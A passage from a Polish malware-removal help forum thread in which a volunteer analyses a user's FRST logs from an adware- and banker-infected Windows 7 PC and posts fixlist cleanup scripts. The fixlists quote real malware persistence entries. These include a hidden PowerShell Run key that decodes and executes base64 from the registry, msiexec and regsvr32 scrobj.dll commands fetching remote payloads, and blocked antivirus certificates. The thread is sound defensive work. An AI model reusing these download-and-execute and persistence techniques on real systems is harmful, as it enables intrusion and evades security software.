Alopus Opublikowano 12 Maja 2017 Zgłoś Udostępnij Opublikowano 12 Maja 2017 (edytowane) Witam wszystkich,jestem tu nowy, ale się przyglądam od dłuższego czasu i... szacunek!Krotko - mój problem - złakomiłem się na program do czyszczenia głowic w drukarkach (systemowo), z którego wcześniej korzystałem. Jednak tym razem źródło było inne i stało się źle - PC Healer, PC coś tam plus, strony porno itd. Część udało mi się usunąć, jednak pozostały problemy jak w tytule:- nie mogę odinstalować initialsite123, próbowałem przez dodaj/usuń (po uruchomieniu nic się nie dzieje), próbowałem programu microsoftu dostępnego u Was (nie znam klucza programu),- przy próbie instalacji oprogramowania zalecanego przez Was (adwcleaner) pojawia się błąd systemu plików,- przy próbie uruchomienia eset online pojawia się z kolei info: Temu wydawcy zablokowano możliwość uruchamiania oprogramowania na tym komputerze. I tu ciekawostka - w okienku jest odsyłacz do pomocy :Jak mam odblokować tego wydawcę?, po kliknieciu otwiera pomoc z informacją: Nie znaleziono tego tematu.Wklejam logi, z góry dzięki za pomoc. Brakuje jeszcze jednego raportu z FRST - zasady działu - uzupełnij proszę. przegapiłem Nowy jestem! EDIT 1: Pojawiła się nowość - komputer firmowy, nie śmiejcie się, więc włączyłem po łikendzie, porzednie problemy zauważyłem w piątek - firefox się zamyka i uruchamia w 2 oknach - Big Bang Emire i Big Farm. Może pogram? Aha, i pytanie z innej beczki, choć dotyczy raportu z FRST Addition.txt - na dole jest sekcja ==================== Statystyki pamięci =========================== Procesor: Intel® Xeon® CPU E5410 @ 2.33GHzProcent pamięci w użyciu: 76%Całkowita pamięć fizyczna: 4093.65 MBDostępna pamięć fizyczna: 970.63 MBCałkowita pamięć wirtualna: 8185.5 MBDostępna pamięć wirtualna: 4417.74 MB Moje pytanie - na płycie jest 8 kości po 1GB, Win widzi 8 GB fizycznej pamieci (w menadżerze), dostępne są jednak tylko 4GB, pozostałe 4 są wyszarzone, korzystam więc tylko z 4GB - ktoś się spotkał z czymś takim? Skąd w raporcie takie dziwne dane?Pewnie jedno z drugim ma coś wspólnego.To nie jest związane z głównym wątkiem, zauważyłem po złożeniu komputera, czyli dość dawno. Addition.txt FRST.txt gmer.txt Shortcut.txt Edytowane 12 Maja 2017 przez Rucek Łączę. Czekamy na Miszela. Odnośnik do komentarza
Miszel03 Opublikowano 12 Maja 2017 Zgłoś Udostępnij Opublikowano 12 Maja 2017 ==================== Statystyki pamięci =========================== Procesor: Intel® Xeon® CPU E5410 @ 2.33GHz Procent pamięci w użyciu: 76% Całkowita pamięć fizyczna: 4093.65 MB Dostępna pamięć fizyczna: 970.63 MB Całkowita pamięć wirtualna: 8185.5 MB Dostępna pamięć wirtualna: 4417.74 MB Moje pytanie - na płycie jest 8 kości po 1GB, Win widzi 8 GB fizycznej pamieci (w menadżerze), dostępne są jednak tylko 4GB, pozostałe 4 są wyszarzone, korzystam więc tylko z 4GB - ktoś się spotkał z czymś takim? Skąd w raporcie takie dziwne dane? Pewnie jedno z drugim ma coś wspólnego. To nie jest związane z głównym wątkiem, zauważyłem po złożeniu komputera, czyli dość dawno. To zostawiam na koniec. EDIT 1: Pojawiła się nowość - komputer firmowy, nie śmiejcie się, więc włączyłem po łikendzie, porzednie problemy zauważyłem w piątek - firefox się zamyka i uruchamia w 2 oknach - Big Bang Emire i Big Farm. Może pogram? Jeśli masz zgodę przełożonych to i ten komputer będę mógł wyczyść, ale później. Nie powiem, że taki stan systemu to ja widzę niecodziennie, bo widzę nawet i kilka razy dziennie co prezentuje obraz sytuacji. Masa infekcji, prefabrykowane przeglądarki, adware podmieniająca publishera i wiele wiele więcej. Proszę na systemie, na którym zostały wygenerowane raporty wykonać poniższe działania oraz pod żadnym pozorem nie wykonywać operacji związanymi z pieniędzmi. Logowanie w bankach, serwisach typu allegro do czasu zakończenia dezynfekcji stanowczo zabronione. Poniższy klucz, element trzeci korzysta z PowerShella - to nie jest normalna, zwłaszcza w takiej sytuacji i w takim miejscu. HKU\S-1-5-21-1391594616-1957220202-1850595550-1000\...\Run: [{30190F18-418E-46D2-9ECB-B950915738AB}] => powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\VGThFBfU').mvZBIpGaSCOHv))); Powiem wprost: podejrzewam infekcję VBKlip / Banatrix / DNSUnlocker i to nie błaha sprawa. Martwi mnie brak jakiegokolwiek zewnętrznego oprogramowania zabezpieczającego, same zabezpieczenia systemu Windows 7 nie są wystarczające. Przejrzyj - KLIK (ew. instalacje zostaw na koniec). 1. Spróbuj przeprowadzić deinstalacje oprogramowania adware / PUP poprzez dedykowany plik deinstalacyjny (nazwa powinna być zbliżona do uninstall.exe). Przejdź do poniższych folderów i rozpocznij w każdym z nich po kolei (jeśli jest możliwość) proces usuwania. C:\Program Files (x86)\BestZiper C:\Users\And\AppData\Roaming\Event Monitor 2. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: Task: {5C315247-7CF8-4294-B160-6CD790E6648C} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-05-09] () Task: {6DE9C13A-8EE5-46B0-B795-AD460E7657A9} - System32\Tasks\RunAtStartup => C:\Users\And\AppData\Roaming\Event Monitor\em.exe Task: {83CD2AE7-350B-4D3D-B940-E7CD2C37AED2} - System32\Tasks\Reozosh => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=3219913727_67194_F412129D&d=20170509 /q Task: {6DB767A5-2000-4EDA-B4FE-EE07B4BAC81D} - System32\Tasks\Lerfopervather Host => C:\Program Files (x86)\Drabocultthhery\nahit.exe [2017-05-09] (Google Inc.) RemoveDirectory: C:\Program Files (x86)\MIO RemoveDirectory: C:\Program Files (x86)\Drabocultthhery MSCONFIG\startupreg: BestZiper => "C:\Program Files (x86)\BestZiper\BestZiper.exe" MSCONFIG\startupreg: N0FGC0HF1V04D31 => "C:\Program Files (x86)\BestZiper\5L5DB.exe" MSCONFIG\startupreg: ukoivek2U'.exe => C:\Program Files\DeviceClient\B58EKQXZ\ukoivek2U'.exe -r1_5 -r2_1 RemoveDirectory: C:\Program Files (x86)\BestZiper HKLM-x32\...\Run: [] => [X] HKLM\...\Policies\Explorer: [EnableShellExecuteHooks] 1 HKU\S-1-5-21-1391594616-1957220202-1850595550-1000\...\Run: [{30190F18-418E-46D2-9ECB-B950915738AB}] => powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\VGThFBfU').mvZBIpGaSCOHv))); HKU\S-1-5-21-1391594616-1957220202-1850595550-1000\...\Run: [background_fault] => C:\Users\And\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-09] (AVAST Software) HKU\S-1-5-21-1391594616-1957220202-1850595550-1000\...\RunOnce: [uninstall.exe] => C:\Users\And\AppData\Local\Temp\{40f055116c864fe295f7b9c35425692f}\28virLgK3B\uninstall.exe [759808 2017-05-10] () C:\Users\And\AppData\Local\background_fault C:\Users\And\AppData\Local\Temp\{40f055116c864fe295f7b9c35425692f}\28virLgK3B HKLM\...\Providers\qm1gaf6p: C:\Program Files (x86)\Lerfopervather Host\local64spl.dll [312832 2017-05-09] () ShellExecuteHooks: Brak nazwy - {6DE8549C-316B-11E7-A1E9-64006A5CFC23} - C:\Users\And\AppData\Roaming\Ckanovofesp\Qpution.dll [147968 2017-05-09] () RemoveDirectory: C:\Program Files (x86)\Lerfopervather Host RemoveDirectory: C:\Users\And\AppData\Roaming\Ckanovofesp CHR HomePage: Default -> hxxp://www.istartsurf.com/?type=hp&ts=1447668479&z=f316c3522e14f508af318b4g6z2zdmeqcq2bbg7b4e&from=cor&uid=SAMSUNGXHM321HI_S265J90Z835696835696 CHR StartupUrls: Default -> "hxxps://www.google.com/analytics/web/?hl=pl&pli=1#report/defaultid/a36587162w64719130p66464611/","hxxps://adwords.google.com/cm/CampaignMgmt?authuser=0&__u=1748779171&__c=8682546511#r.ONLINE.cm&app=cm","hxxps://merchants.google.com/Home?a=10826943#insights","hxxps://mysalesbee.com/#app/dashboard","hxxp://druktak.pl/administracja/login_admin.php?osCAdminID=pn0s2alrf79plgtqaqmprnmu91" R2 BIT; C:\ProgramData\BIT\BIT.dll [1858048 2017-05-09] (BIT.dll) [brak podpisu cyfrowego] R2 VNASRE; C:\Users\And\AppData\Local\VNASRE\Snare.dll [826368 2017-05-09] (InterSect Alliance Pty Ltd) [brak podpisu cyfrowego] S2 WinSAPSvc; C:\Users\And\AppData\Roaming\WinSAPSvc\WinSAP.dll [X] S2 Recover; C:\Program Files\HJ32FO8OE1\CDXYBXJQWQGUU5\fDorppRER_.exe [X] C:\ProgramData\BIT C:\Users\And\AppData\Local\VNASRE C:\Users\And\AppData\Roaming\WinSAPSvc S2 DgiVecp; \??\C:\Windows\system32\Drivers\DgiVecp.sys [X] S3 netr7364; system32\DRIVERS\netr7364.sys [X] C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\McAfee Security Scan Plus.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lexmark 1200 Series\Lexmark Solution Center.LNK C:\Users\And\Links\151119.lnk C:\Users\And\Links\160602.lnk C:\Users\And\Desktop\fakt NOWY KW.lnk ShortcutWithArgument: C:\Users\And\Desktop\BigFarm.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://bigfarm.goodgamestudios.com/?w=239064 ShortcutWithArgument: C:\Users\And\Desktop\big_bang_empire.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www.bigbangempire.com/?ref=281-000-000-005 C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk C:\Users\And\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk C:\Users\And\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Mozilla Firefox.lnk C:\Users\Public\Desktop\Mozilla Firefox.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk C:\Users\And\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk C:\Users\And\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk C:\Users\And\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk C:\Users\Public\Desktop\Google Chrome.lnk RemoveDirectory: C:\Program Files (x86)\Eggper RemoveDirectory: C:\Program Files (x86)\Firefox EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 4. Wyczyść i zabezpiecz przeglądarkę Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj wszystkie nieznane i niepotrzebne Ci rozszerzenia. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin. Ustaw tą przeglądarkę jako domyślną, aby cofnąć modyfikację infekcji. 5. Wyczyść i zabezpiecz przeglądarkę Mozilla FireFox: Odłącz synchronizację (o ile włączona): KLIK. Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. Menu Historia > Wyczyść historię przeglądania. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin. 6. Pobierz AdwCleaner uruchom go i kliknij Skanuj, kiedy skanowanie zakończy się wydobądź z niego raport, znajduję się on w folderze C:\AdwCleaner. Raport zaprezentuj na forum. 7. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry). eggper;firefox Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum. 8. Zrób nowy log FRST z opcji Skanuj (Scan), wraz z Addition i Shortcut. Dołącz też plik fixlog.txt. Odnośnik do komentarza
Alopus Opublikowano 17 Maja 2017 Autor Zgłoś Udostępnij Opublikowano 17 Maja 2017 (edytowane) Czołem!Wszystkie objawy, które opisywałem dotyczą tego samego PC.A teraz po kolei co się udało:- Best zipper - musiałem usunąć wcześniej, został katalog z plikami - usunąłem,- Event Monitor - nie ma niestety nawet pół execa ani nic podobnego, lista plików:2016-04-18 16:38 634 eng_em.ini2016-04-18 16:38 662 French_em.ini2016-05-10 18:04 718 German_em.ini2017-05-10 11:55 264 ininotfound0.ini2017-01-05 18:45 157˙632 isxdl.dll2016-05-25 18:30 562 japan_em.ini2017-05-09 12:16 82 log_05-09-2017.log2017-05-10 11:53 82 log_05-10-2017.log2017-05-10 11:54 328 update.ini - FRST z opcją napraw wygenerował plik,- po zapuszczeniu FRST z opcją napraw Chrome i Firefox zniknęły z systemu - zainstalowałem ff,- synchronizacji w ff nie było, odświeżyłem, zainstalowałem ublocka,- chroma na razie nie instaluję, choć go potrzebuję bardzo - korzystam z anliticsów, adwordsów i takich tam,- AdwCleaner - niestety dalej błąd systemu plików (65535),- puściłem FRST z opcją szukaj,- puściłem FRST z opcją skanuj. Wszystkie raporty w załącznikach.EDIT: Podbijam temat po cichu ciągle licząc na pomoc. Jeśli wykraczam poza regulamin forum, proszę o łagodną karę. Addition.txt Shortcut.txt SearchReg.txt Fixlog.txt Edytowane 17 Maja 2017 przez Rucek Odnośnik do komentarza
Alopus Opublikowano 19 Maja 2017 Autor Zgłoś Udostępnij Opublikowano 19 Maja 2017 Kolejna nowość - problem z przeglądarkami. Pisałem wyżej, że po puszczeniu FRST z opcją napraw znikneły wyszukiwarki ff i chrome, że zainstalowłem ff, a chrome nie. Linki do chroma nie działały itd. Otóż wczoraj się pojawił !!! i działa. Oczywiście nie normalnie. Obie przeglądarki są zainfekowane!? Każde wyszukanie włącza inną przeglądarkę, np: http://mystart2.dealwifi.com, którą mogę usunąc przez opcje przeglądarki (ustawia się jako główna) lub nie. Odnośnik do komentarza
Rucek Opublikowano 19 Maja 2017 Zgłoś Udostępnij Opublikowano 19 Maja 2017 Zrób nowe 3 logi z FRST. Odnośnik do komentarza
Alopus Opublikowano 19 Maja 2017 Autor Zgłoś Udostępnij Opublikowano 19 Maja 2017 (edytowane) Wklejam świeże pliki z FRST Addition.txt FRST.txt Shortcut.txt Edytowane 19 Maja 2017 przez Rucek Ok, teraz czekamy na Miszela. Odnośnik do komentarza
Miszel03 Opublikowano 15 Czerwca 2017 Zgłoś Udostępnij Opublikowano 15 Czerwca 2017 Jeśli dostarczysz nowe raporty (może być bez GMER) do godziny 16 to przez wyjazdem zdążę zabrać się za instrukcję. Temat przedawnił się w takim stopniu, że najpierw muszę znowu zobaczyć na czym stoimy. Wersja: 14-05-2017 Pamiętaj, aby użyć najnowszej wersji: KLIK. Odnośnik do komentarza
Alopus Opublikowano 19 Czerwca 2017 Autor Zgłoś Udostępnij Opublikowano 19 Czerwca 2017 Dałeś mi za mało czasu, też wakacjowałem! Ale dzięki za chęci. Już mentalnie nastawiłem się na format i instalację Pojawiły się nowe problemy, ale akurat w tym momencie ich nie widzę, jak zdołam zanotować, to je wkleję (chodzi o wyskakujące okno z info o błędzie jakimś tam). Wklejam świeże pliki. FRST.txt Addition.txt Shortcut.txt Odnośnik do komentarza
Miszel03 Opublikowano 19 Czerwca 2017 Zgłoś Udostępnij Opublikowano 19 Czerwca 2017 Wcześniej trochę miałem niedyspozycyjność czasową, ale teraz wrzucam ten temat na priorytet, więc szybko się ze wszystkim uporamy, Kolosalny bałagan (jest gorzej niż było wcześniej). Infekcyjne usługi, modyfikacje skrótów LNK i wiele, wiele więcej. Przeglądarki w opłakanym stanie i pomimo wywalenia profili od fałszywek i tak zostaną inne, więc uważam, że wymiana profili będzie słuszna. Oprócz tego infekcja wprowadziła blokady certyfikatów producentów oprogramowania zabezpieczającego. Zapoznaj się: KLIK. Informacji o braków pewnych wymaganych spraw w systemie nie będę ponownie podawał, bo znajdziesz je w moim pierwszym poście w tym temacie. 1. Deinstalacje. Przez panel sterowania odinstaluj programy adware / fałszywe antywirusy: initialsite123 - Uninstall, YAC(Yet Another Cleaner!). Za pomocą narzędzia Program Install and Uninstall Troubleshooter odinstaluj wszystkie cztery pozycje: AlphaGo. 2. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses:CreateRestorePoint:Task: {7FFF2EF2-C146-4D1C-A628-4D785460AA93} - System32\Tasks\Exif Bestel for Windows 8 => Rundll32.exe "C:\Program Files\Exif Bestel for Windows 8\Exif Bestel for Windows 8.dll",ypTQVww Task: {76C36436-3B21-4573-B63E-D6F250AB84E1} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-05-17] () C:\Program Files (x86)\MIOShortcutWithArgument: C:\Users\And\Desktop\BigFarm.lnk -> C:\Program Files (x86)\Firefox\Firefox.exe (Mozilla Corporation) -> hxxp://bigfarm.goodgamestudios.com/?w=239064ShortcutWithArgument: C:\Users\And\Desktop\big_bang_empire.lnk -> C:\Program Files (x86)\Firefox\Firefox.exe (Mozilla Corporation) -> hxxp://www.bigbangempire.com/?ref=281-000-000-005ShortcutWithArgument: C:\Users\And\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1494834163&z=5ad105cef59cf056d23a713gcz8taz9bdcdz7gaqac&from=che0812&uid=3219913727_67194_F412129DShortcutWithArgument: C:\Users\And\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\BigFarm.lnk -> C:\Program Files (x86)\Firefox\Firefox.exe (Mozilla Corporation) -> hxxp://bigfarm.goodgamestudios.com/?w=239064ShortcutWithArgument: C:\Users\And\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\big_bang_empire.lnk -> C:\Program Files (x86)\Firefox\Firefox.exe (Mozilla Corporation) -> hxxp://www.bigbangempire.com/?ref=281-000-000-005C:\Users\And\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnkC:\Users\And\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnkC:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnkC:\Users\Public\Desktop\Google Chrome.lnkC:\Users\And\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnkC:\Users\And\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Mozilla Firefox.lnkC:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnkC:\Users\Public\Desktop\Mozilla Firefox.lnkC:\Program Files (x86)\HotleafC:\Users\And\AppData\Roaming\HotleafC:\Users\And\AppData\Local\HotleafC:\Program Files (x86)\FirefoxC:\Users\And\AppData\Roaming\FirefoxC:\Users\And\AppData\Local\FirefoxHKLM\...\RunOnce: [AND-KOMPUTER] => C:\Windows\Temp\gBAC6.tmp.exe [239104 2017-06-19] () HKLM\ DisallowedCertificates: 03D22C9C66915D58C88912B64C1F984B8344EF09 (Comodo Security Solutions) HKLM\ DisallowedCertificates: 0F684EC1163281085C6AF20528878103ACEFCAAB (F-Secure Corporation) HKLM\ DisallowedCertificates: 1667908C9E22EFBD0590E088715CC74BE4C60884 (FRISK Software International/F-Prot) HKLM\ DisallowedCertificates: 18DEA4EFA93B06AE997D234411F3FD72A677EECE (Bitdefender SRL) HKLM\ DisallowedCertificates: 2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF (G DATA Software AG) HKLM\ DisallowedCertificates: 249BDA38A611CD746A132FA2AF995A2D3C941264 (Malwarebytes Corporation) HKLM\ DisallowedCertificates: 31AC96A6C17C425222C46D55C3CCA6BA12E54DAF (Symantec Corporation) HKLM\ DisallowedCertificates: 331E2046A1CCA7BFEF766724394BE6112B4CA3F7 (Trend Micro) HKLM\ DisallowedCertificates: 3353EA609334A9F23A701B9159E30CB6C22D4C59 (Webroot Inc.) HKLM\ DisallowedCertificates: 373C33726722D3A5D1EDD1F1585D5D25B39BEA1A (SUPERAntiSpyware.com) HKLM\ DisallowedCertificates: 3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F (Kaspersky Lab) HKLM\ DisallowedCertificates: 3D496FA682E65FC122351EC29B55AB94F3BB03FC (AVG Technologies CZ) HKLM\ DisallowedCertificates: 4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159 (PC Tools) HKLM\ DisallowedCertificates: 42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 (K7 Computing Pvt Ltd) HKLM\ DisallowedCertificates: 4420C99742DF11DD0795BC15B7B0ABF090DC84DF (Doctor Web Ltd.) HKLM\ DisallowedCertificates: 4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF (Emsisoft Ltd) HKLM\ DisallowedCertificates: 5240AB5B05D11B37900AC7712A3C6AE42F377C8C (Check Point Software Technologies Ltd.) HKLM\ DisallowedCertificates: 5DD3D41810F28B2A13E9A004E6412061E28FA48D (Emsisoft Ltd) HKLM\ DisallowedCertificates: 7457A3793086DBB58B3858D6476889E3311E550E (K7 Computing Pvt Ltd) HKLM\ DisallowedCertificates: 76A9295EF4343E12DFC5FE05DC57227C1AB00D29 (BullGuard Ltd) HKLM\ DisallowedCertificates: 775B373B33B9D15B58BC02B184704332B97C3CAF (McAfee) HKLM\ DisallowedCertificates: 872CD334B7E7B3C3D1C6114CD6B221026D505EAB (Comodo Security Solutions) HKLM\ DisallowedCertificates: 88AD5DFE24126872B33175D1778687B642323ACF (McAfee) HKLM\ DisallowedCertificates: 9132E8B079D080E01D52631690BE18EBC2347C1E (Adaware Software) HKLM\ DisallowedCertificates: 982D98951CF3C0CA2A02814D474A976CBFF6BDB1 (Safer Networking Ltd.) HKLM\ DisallowedCertificates: 9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 (Webroot Inc.) HKLM\ DisallowedCertificates: 9C43F665E690AB4D486D4717B456C5554D4BCEB5 (ThreatTrack Security) HKLM\ DisallowedCertificates: 9E3F95577B37C74CA2F70C1E1859E798B7FC6B13 (CURIOLAB S.M.B.A.) HKLM\ DisallowedCertificates: A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 (Avira Operations GmbH & Co. KG) HKLM\ DisallowedCertificates: A5341949ABE1407DD7BF7DFE75460D9608FBC309 (BullGuard Ltd) HKLM\ DisallowedCertificates: A59CC32724DD07A6FC33F7806945481A2D13CA2F (ESET) HKLM\ DisallowedCertificates: AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947 (AVG Technologies CZ) HKLM\ DisallowedCertificates: AD4C5429E10F4FF6C01840C20ABA344D7401209F (Avast Antivirus/Software) HKLM\ DisallowedCertificates: AD96BB64BA36379D2E354660780C2067B81DA2E0 (Symantec Corporation) HKLM\ DisallowedCertificates: B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 (Malwarebytes Corporation) HKLM\ DisallowedCertificates: CDC37C22FE9272D8F2610206AD397A45040326B8 (Trend Micro) HKLM\ DisallowedCertificates: D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 (Kaspersky Lab) HKLM\ DisallowedCertificates: DB303C9B61282DE525DC754A535CA2D6A9BD3D87 (ThreatTrack Security) HKLM\ DisallowedCertificates: DB77E5CFEC34459146748B667C97B185619251BA (Avast Antivirus/Software) HKLM\ DisallowedCertificates: E22240E837B52E691C71DF248F12D27F96441C00 (Total Defense, Inc.) HKLM\ DisallowedCertificates: E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF (AVG Technologies CZ) HKLM\ DisallowedCertificates: ED841A61C0F76025598421BC1B00E24189E68D54 (Bitdefender SRL) HKLM\ DisallowedCertificates: F83099622B4A9F72CB5081F742164AD1B8D048C9 (ESET) HKLM\ DisallowedCertificates: FBB42F089AF2D570F2BF6F493D107A3255A9BB1A (Panda Security S.L) HKLM\ DisallowedCertificates: FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 (Doctor Web Ltd.) HKU\S-1-5-21-1391594616-1957220202-1850595550-1000\...\Run: [COM+] => regsvr32 /s /n /u /i:hxxp://server2.bjdnxbgp3.ru/setup.xml scrobj.dllHKU\S-1-5-21-1391594616-1957220202-1850595550-1000\...\Run: [background_fault] => C:\Users\And\AppData\Local\background_fault\aswRD.exe [1419576 2017-04-06] (AVAST Software) HKU\S-1-5-21-1391594616-1957220202-1850595550-1000\...\Policies\system: [shell] explorer.exe,msiexec.exe /i hxxp://point.ltdmsjq.com/?data=zDlkMj84N8EcOTYyRWhWMYNYMjU1NTlWFjq4M8E1NjHxMdhQRH== /q C:\Users\And\AppData\Local\background_faultHKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1494834163&z=5ad105cef59cf056d23a713gcz8taz9bdcdz7gaqac&from=che0812&uid=3219913727_67194_F412129DHKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1494834163&z=5ad105cef59cf056d23a713gcz8taz9bdcdz7gaqac&from=che0812&uid=3219913727_67194_F412129DHKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1494834163&z=5ad105cef59cf056d23a713gcz8taz9bdcdz7gaqac&from=che0812&uid=3219913727_67194_F412129D&q={searchTerms}HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1494834163&z=5ad105cef59cf056d23a713gcz8taz9bdcdz7gaqac&from=che0812&uid=3219913727_67194_F412129D&q={searchTerms}HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1494834163&z=5ad105cef59cf056d23a713gcz8taz9bdcdz7gaqac&from=che0812&uid=3219913727_67194_F412129DHKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1494834163&z=5ad105cef59cf056d23a713gcz8taz9bdcdz7gaqac&from=che0812&uid=3219913727_67194_F412129DHKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1494834163&z=5ad105cef59cf056d23a713gcz8taz9bdcdz7gaqac&from=che0812&uid=3219913727_67194_F412129D&q={searchTerms}HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1494834163&z=5ad105cef59cf056d23a713gcz8taz9bdcdz7gaqac&from=che0812&uid=3219913727_67194_F412129D&q={searchTerms}HKU\S-1-5-21-1391594616-1957220202-1850595550-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1495440636&z=1816b38e206bb99366246a4g3z0tew3z9zee7q8c6m&from=che0812&uid=3219913727_67194_F412129D&q={searchTerms}HKU\S-1-5-21-1391594616-1957220202-1850595550-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1494834163&z=5ad105cef59cf056d23a713gcz8taz9bdcdz7gaqac&from=che0812&uid=3219913727_67194_F412129DHKU\S-1-5-21-1391594616-1957220202-1850595550-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1494834163&z=5ad105cef59cf056d23a713gcz8taz9bdcdz7gaqac&from=che0812&uid=3219913727_67194_F412129DHKU\S-1-5-21-1391594616-1957220202-1850595550-1000\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1495440636&z=1816b38e206bb99366246a4g3z0tew3z9zee7q8c6m&from=che0812&uid=3219913727_67194_F412129D&q={searchTerms}SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1494834163&z=5ad105cef59cf056d23a713gcz8taz9bdcdz7gaqac&from=che0812&uid=3219913727_67194_F412129D&q={searchTerms}SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1494834163&z=5ad105cef59cf056d23a713gcz8taz9bdcdz7gaqac&from=che0812&uid=3219913727_67194_F412129D&q={searchTerms}SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1494834163&z=5ad105cef59cf056d23a713gcz8taz9bdcdz7gaqac&from=che0812&uid=3219913727_67194_F412129D&q={searchTerms}SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = 